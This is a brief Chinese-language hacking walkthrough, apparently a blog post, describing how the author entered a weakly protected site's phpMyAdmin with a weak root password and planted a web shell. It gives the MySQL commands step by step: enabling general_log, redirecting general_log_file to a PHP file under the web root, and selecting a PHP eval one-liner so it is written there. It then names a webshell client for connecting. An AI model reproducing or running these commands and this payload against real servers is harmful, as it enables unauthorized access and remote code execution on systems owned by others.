phpmyadmin拿权限
挺垃圾的一个网站通过弱口令root进入后台。
最主要还能直接访问网站根目录下phpinfo查看网站绝对路径。
1.首先尝试执行outfile语句写入一句话木马
报错显示说是数据库正在运行–secure_file_priv选项,无法执行outfile这个语句。感觉在这个参数上做了限制。
这是secure_file_priv参数的说明。
2.执行show variables like “%secure%”; 查看配置
回显设置为NULL,没有做限制,但是不能写入一句话。暂时不知道原因,后续懂了做补充。
3.查看general_log是否开启
通过show global variables like “%genera%”;查看
执行set global general_log=‘on’;打开
4.通过generali_log_file写入一句话木马
set global general_log_file=“网站绝对路径/文件名”; select ‘<?php @eval($_POST[1])?>’;
5.使用蚁剑进行连接
general log说明;
eneral_log_file会记录所有的查询语句,以原始的状态来显示,如果将general_log开关打开,general_log_file设置为一个php文件,则查询的操作将会全部写入到general_log_file指定的文件,通过访问general_log_file指定的文件来获取webshell。